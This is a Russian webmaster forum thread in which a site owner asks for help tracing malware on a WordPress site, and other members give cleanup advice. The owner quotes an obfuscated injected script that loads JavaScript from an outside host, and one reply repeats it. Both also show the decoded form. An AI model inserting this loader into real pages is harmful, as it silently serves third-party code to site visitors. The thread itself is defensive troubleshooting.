X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Помогите найти вирус на сайте
ERSEO
ERSEO
Topic Starter сообщение 26.9.2013, 19:50; Ответить: ERSEO
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 405
Регистрация: 15.6.2011
Из: Москва
Поблагодарили: 21 раз
Репутация:   2  


Добрый день, суть проблемы:
Недавно почистил свой сайт от вирусов, и везде проверил - вроде нету, а сегодня заметил ссылку на сайте
http://reviewhoax.com/wp-includes/pomo/.backup/.script.js

В коде страницы я нашел только это:
находится в самом низу страницы (если смотреть в коде) на сайте 2013ege.ru
<div></div>
</body>
</html><script>
document.write(unescape('<script%20%73%72%63%3D%68%74%74%70%3A%2F%2F%72%65%76%69%65%77%68%6F%61%78%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%70%6F%6D%6F%2F%2E%62%61%63%6B%75%70%2F%2E%73%63%72%69%70%74%2E%6A%73%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>

Расшифровал и получил:
document.write(unescape('<script src=http://reviewhoax.com/wp-includes/pomo/.backup/.script.js type=text/javascript></script>'));

Вообщем я не знаю, где может находится этот код и как он может образовываться. И еще, нашел в коде файл
http://2013ege.ru/wp-content/themes/SinCrew/script.js

Помогите найти где может находится этот код, скрипт или хотя бы чем проверить.
Спасибо.


--------------------
Имеются инвайты в PROFITRAF - напишите в ЛС о ваших сайтах.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
sdrc26
sdrc26
сообщение 26.9.2013, 20:40; Ответить: sdrc26
Сообщение #2


Завсегдатай
*****

Группа: Active User
Сообщений: 751
Регистрация: 25.10.2009
Из: Амстердам
Поблагодарили: 215 раз
Репутация:   32  


У вашего хостера есть антивирус на сервере?
Ищите в шаблоне WP в файле футер

напишите свой ICQ постараюсь помочь

Сообщение отредактировал sdrc26 - 26.9.2013, 20:45


--------------------
__________________AMSTERDAM__________________

ISPmgr Lite / Pro - 3 / 5.5 EUR в месяц или 22 / 40 EUR Вечная

P.S. Занимаюсь предоставлением услуг Хостинга с 2007-ого года
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 27.9.2013, 10:32; Ответить: Electric
Сообщение #3


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


Ищите base64_decode в шаблоне и дешифруйте.

Возможно подгружают извне, смотрите в шаблоне file_get_contents
Если сами не найдете - обращайтесь, будем лечить.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BRONX
BRONX
сообщение 27.9.2013, 11:49; Ответить: BRONX
Сообщение #4


Частый гость
**


Группа: User
Сообщений: 62
Регистрация: 26.8.2013
Поблагодарили: 13 раз
Репутация:   3  


Само собой, с паблика взяли шаблон, если не понимаете в php / html смысла нет такую шару ставить, 80% что там будут как минимум ссылки на другие ресурсы, фреймы незаметные ведущие на какой нибудь левый сайт, все это пройденный этап.
Electric чуть выше правильно ответил

к стати удалите код, он с другого ресурса, вообще код ссылки с других ресурсов надо резать, допустимо только с проверенных ресурсов.

<script>
document.write(unescape('<script%20%73%72%63%3D%68%74%74%70%3A%2F%2F%72%65%76%69%65%77%68%6F%61%78%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%70%6F%6D%6F%2F%2E%62%61%63%6B%75%70%2F%2E%73%63%72%69%70%74%2E%6A%73%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Помогите выбрать ноутбук
Ноутбук для детей
23 kstnews 458 Сегодня, 16:14
автор: kstnews
Открытая тема (нет новых ответов) SimplePay: Прием платежей на сайте для юридических и физических лиц
4 kuprum 544 15.12.2017, 14:07
автор: kuprum
Горячая тема (нет новых ответов) Рекомендую: размещение статьи на сайте, ТИЦ 325, PR 6, траст XT 8
44 rumblade 10713 14.12.2017, 15:45
автор: rumblade
Открытая тема (нет новых ответов) 17 вещей на вашем сайте, которые ненавидят
Один из постулатов маркетинга — не раздражать людей
25 PostBrigada 3639 12.12.2017, 21:44
автор: alexandrrr
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПрибыль с видео на сайте и в соц сетях
Как получить доп доход с нативного контента
14 maxim_krasovskiy 2843 12.12.2017, 12:05
автор: maxim_krasovskiy


 



RSS Текстовая версия Сейчас: 18.12.2017, 20:26
Дизайн